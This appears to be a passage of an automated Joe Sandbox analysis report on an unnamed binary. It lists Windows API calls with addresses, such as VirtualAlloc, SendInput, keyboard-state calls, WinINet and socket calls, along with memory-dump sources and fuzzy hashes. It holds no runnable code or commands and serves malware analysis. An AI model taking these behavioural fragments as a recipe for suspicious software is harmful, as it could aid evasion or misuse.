                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,003F6AA6), ref: 003AAB2D
                                                                                                                      • _wcscmp.LIBCMT ref: 003AAB49
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper_wcscmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 820872866-0
                                                                                                                      • Opcode ID: 407968d985c88543de06b3e7be817ee1af59c0e2d7e4594d85b652dd168a376f
                                                                                                                      • Instruction ID: 38e16a48560b8910fe51fb9bd51760de73c2bd31cb9ee89814002fe3a74a2573
                                                                                                                      • Opcode Fuzzy Hash: 407968d985c88543de06b3e7be817ee1af59c0e2d7e4594d85b652dd168a376f
                                                                                                                      • Instruction Fuzzy Hash: B6A1247270090ADBDB16DF64E9806BDBBA5FF49300F65416AEC06C7290EB30D8B0C796
                                                                                                                      APIs
                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 00400D85
                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 00400DC8
                                                                                                                        • Part of subcall function 00400458: CharLowerBuffW.USER32(?,?,?,?), ref: 00400478
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00400FB2
                                                                                                                      • _memmove.LIBCMT ref: 00400FC2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 003FAF56
                                                                                                                      • CoUninitialize.COMBASE ref: 003FAF61
                                                                                                                        • Part of subcall function 003E1050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 003E10B8
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 003FAF6C
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003FB23F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                      APIs
                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003EEF32
                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 003EEF58
                                                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003EEF7D
                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003EEFA9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                      APIs
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0040D617
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040D68D
                                                                                                                      • PtInRect.USER32(?,?,0040EB2C), ref: 0040D69D
                                                                                                                      • MessageBeep.USER32(00000000), ref: 0040D70E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 003E44EE
                                                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 003E450A
                                                                                                                      • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 003E456A
                                                                                                                      • SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 003E45C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                      APIs
                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003D4DE8
                                                                                                                      • __isleadbyte_l.LIBCMT ref: 003D4E16
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 003D4E44
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 003D4E7A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32 ref: 00407AB6
                                                                                                                        • Part of subcall function 003E69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 003E69E3
                                                                                                                        • Part of subcall function 003E69C9: GetCurrentThreadId.KERNEL32 ref: 003E69EA
                                                                                                                        • Part of subcall function 003E69C9: AttachThreadInput.USER32(00000000,?,003E8127), ref: 003E69F1
                                                                                                                      • GetCaretPos.USER32(?), ref: 00407AC7
                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 00407B00
                                                                                                                      • GetForegroundWindow.USER32 ref: 00407B06
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2759813231-0
                                                                                                                      • Opcode ID: 7b905a0b54eb391a87cba8d79d27ae6bd69640105fc4c7c74d4bb16f92581af0
                                                                                                                      • Instruction ID: c9721dcaec4a6565ec68b15e64bbd901c27a1cb62caf3aafa28bc957cce96a4d
                                                                                                                      • Opcode Fuzzy Hash: 7b905a0b54eb391a87cba8d79d27ae6bd69640105fc4c7c74d4bb16f92581af0
                                                                                                                      • Instruction Fuzzy Hash: 6A314F71D00108AFCB11EFB5DC819EFBBF9EF59314B10816AF915E7211D634AE058BA0
                                                                                                                      APIs
                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003F49B7
                                                                                                                        • Part of subcall function 003F4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003F4A60
                                                                                                                        • Part of subcall function 003F4A41: InternetCloseHandle.WININET(00000000), ref: 003F4AFD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$CloseConnectHandleOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1463438336-0
                                                                                                                      • Opcode ID: 97f6466ec5882422cd2cdac395b2d3ed9d15bbfc3ee752b09b03747a11a2478b
                                                                                                                      • Instruction ID: d9e3aacde537bb89de82002baac5648fb3b5288d5f4c08f4a74514ac6831f245
                                                                                                                      • Opcode Fuzzy Hash: 97f6466ec5882422cd2cdac395b2d3ed9d15bbfc3ee752b09b03747a11a2478b
                                                                                                                      • Instruction Fuzzy Hash: 3F219231740609BBEB139F608C00FBBB7A9FB89711F14402AFB15D6550EB719921A794
                                                                                                                      APIs
                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 004088A3
                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004088BD
                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004088CB
                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 004088D9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2169480361-0
                                                                                                                      • Opcode ID: 6ccd306516280682cf0786600c00503be1846e063ec5ef860611830f6d305c7b
                                                                                                                      • Instruction ID: 0930bfc3c2ca5fd018611eb99a3ac170918f1fa8a605fd248b12ec133ab25783
                                                                                                                      • Opcode Fuzzy Hash: 6ccd306516280682cf0786600c00503be1846e063ec5ef860611830f6d305c7b
                                                                                                                      • Instruction Fuzzy Hash: A411B132704114AFDB15AB24CD05FAA7BA9EF86320F14812AF956DB2E1CB74AC01C798
                                                                                                                      APIs
                                                                                                                      • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 003F906D
                                                                                                                      • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 003F907F
                                                                                                                      • accept.WS2_32(00000000,00000000,00000000), ref: 003F908C
                                                                                                                      • WSAGetLastError.WS2_32(00000000), ref: 003F90A3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastacceptselect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 385091864-0
                                                                                                                      • Opcode ID: 011b0f9687c4931abd1070403b192eb910e42c358c57b779b30545c872d30175
                                                                                                                      • Instruction ID: ab8f5d12ad878b7a5571e490fc2874b2397fd523413470e5f6fe5147dc652681
                                                                                                                      • Opcode Fuzzy Hash: 011b0f9687c4931abd1070403b192eb910e42c358c57b779b30545c872d30175
                                                                                                                      • Instruction Fuzzy Hash: 41215475A001249FC721DF69C885A9ABBFCEF49710F00816AF949D7290DA749A45CBA0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003E2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,003E18FD,?,?,?,003E26BC,00000000,000000EF,00000119,?,?), ref: 003E2CB9
                                                                                                                        • Part of subcall function 003E2CAA: lstrcpyW.KERNEL32(00000000,?,?,003E18FD,?,?,?,003E26BC,00000000,000000EF,00000119,?,?,00000000), ref: 003E2CDF
                                                                                                                        • Part of subcall function 003E2CAA: lstrcmpiW.KERNEL32(00000000,?,003E18FD,?,?,?,003E26BC,00000000,000000EF,00000119,?,?), ref: 003E2D10
                                                                                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,003E26BC,00000000,000000EF,00000119,?,?,00000000), ref: 003E1916
                                                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,003E26BC,00000000,000000EF,00000119,?,?,00000000), ref: 003E193C
                                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,003E26BC,00000000,000000EF,00000119,?,?,00000000), ref: 003E1970
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                                      • String ID: cdecl
                                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                                      • Opcode ID: 53aaa2c41384355066a5babc4198e7cf709b21cb4320a54c3ad0ae4f74dc8906
                                                                                                                      • Instruction ID: 4844830dc6ae60e8cd2b1e2eead4c9220930abfb72351598bfc5fc1b000597d8
                                                                                                                      • Opcode Fuzzy Hash: 53aaa2c41384355066a5babc4198e7cf709b21cb4320a54c3ad0ae4f74dc8906
                                                                                                                      • Instruction Fuzzy Hash: 3411033A200351AFCB26AF35C845E7A77B8FF44350B51812AF806CB291EB319811C7E0
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 003E715C
                                                                                                                      • _memset.LIBCMT ref: 003E717D
                                                                                                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003E71CF
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 003E71D8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1157408455-0
                                                                                                                      • Opcode ID: 1a930a01e6545914befdb9e85b4d85bb307f545d92c272fdd2d94e6cf660b8ac
                                                                                                                      • Instruction ID: 9dbb18540a85e0b54c77cf97cce9ef4b4365cb4835ea3f67ef43b5b20e14310e
                                                                                                                      • Opcode Fuzzy Hash: 1a930a01e6545914befdb9e85b4d85bb307f545d92c272fdd2d94e6cf660b8ac
                                                                                                                      • Instruction Fuzzy Hash: 9611CA72E013287AD7305BA5AC4DFEBBA7CEF45760F1042AAF504E71D0D2744E808BA9
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003E13EE
                                                                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003E1409
                                                                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003E141F
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 003E1474
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3137044355-0
                                                                                                                      • Opcode ID: 4d2d23bed38e519782478f0888b0b528d3187ed714ad6933f1deca24a8c0b1f0
                                                                                                                      • Instruction ID: 66700528198922558b52eeb7f0f827dd145416de03f820b49184952d471f3f6a
                                                                                                                      • Opcode Fuzzy Hash: 4d2d23bed38e519782478f0888b0b528d3187ed714ad6933f1deca24a8c0b1f0
                                                                                                                      • Instruction Fuzzy Hash: 9421A271A00259AFDB22DF93DC88EDABBBCEF00700F408669A512976D0D7B0E905CF50
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 003DC285
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003DC297
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003DC2AD
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003DC2C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: 179378fb19dba7184b9ddb5798da8caf60514e0f972a5943ae5a99517dc51052
                                                                                                                      • Instruction ID: 55b004e78bd005d36f6daf2aa8c9d5e680497b8500d854aeec8ec078afc34c43
                                                                                                                      • Opcode Fuzzy Hash: 179378fb19dba7184b9ddb5798da8caf60514e0f972a5943ae5a99517dc51052
                                                                                                                      • Instruction Fuzzy Hash: A511187A950219FFDF11DBD8DC85E9DBBB8FB08710F204492EA04B7294D671AE10DB94
                                                                                                                      APIs
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003E354D,?,003E45D5,?,00008000), ref: 003E49EE
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,003E354D,?,003E45D5,?,00008000), ref: 003E4A13
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003E354D,?,003E45D5,?,00008000), ref: 003E4A1D
                                                                                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,003E354D,?,003E45D5,?,00008000), ref: 003E4A50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2875609808-0
                                                                                                                      • Opcode ID: e67537308077bf2bbeb95df740ed6fb1efcbdd2deba420a669eefb48ff5a473e
                                                                                                                      • Instruction ID: ca4df2e5e6032a013654c1fc6cd78d20d7081a96ab9b0e37596237f9b69dd761
                                                                                                                      • Opcode Fuzzy Hash: e67537308077bf2bbeb95df740ed6fb1efcbdd2deba420a669eefb48ff5a473e
                                                                                                                      • Instruction Fuzzy Hash: AF115A31D40568DBCF01EFA6D949AEEBB78FF08721F414265E941B2280CB309560CB99
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3016257755-0
                                                                                                                      • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                      • Instruction ID: e67c23fa2e4d9ead00bf2b7e698993b3cb9fb971b6ad920e619e25930fbf8e00
                                                                                                                      • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                      • Instruction Fuzzy Hash: 1A01423300064EBBCF135E84EC41CED3F66BB18350B558416FA1859231D236CAB1AB81
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003C869D: __getptd_noexit.LIBCMT ref: 003C869E
                                                                                                                      • __lock.LIBCMT ref: 003C811F
                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 003C813C
                                                                                                                      • _free.LIBCMT ref: 003C814F
                                                                                                                      • InterlockedIncrement.KERNEL32(00F323D8), ref: 003C8167
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2704283638-0
                                                                                                                      • Opcode ID: aa525f8285ad5ab24664ff5c5a0b90337297c13b069cc2a278df2f25a4ad12a3
                                                                                                                      • Instruction ID: 7ad93aefd5a4598f56706ef7a8e3961a1bf672afce972f03de83fc60dc6c5c26
                                                                                                                      • Opcode Fuzzy Hash: aa525f8285ad5ab24664ff5c5a0b90337297c13b069cc2a278df2f25a4ad12a3
                                                                                                                      • Instruction Fuzzy Hash: 690161319027119BCB13AF65980AF6973A0BF04716F19011DF814EB692CF345E52CFD6
                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 003C8768
                                                                                                                        • Part of subcall function 003C8984: __mtinitlocknum.LIBCMT ref: 003C8996
                                                                                                                        • Part of subcall function 003C8984: RtlEnterCriticalSection.NTDLL(003C0127), ref: 003C89AF
                                                                                                                      • InterlockedIncrement.KERNEL32(DC840F00), ref: 003C8775
                                                                                                                      • __lock.LIBCMT ref: 003C8789
                                                                                                                      • ___addlocaleref.LIBCMT ref: 003C87A7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
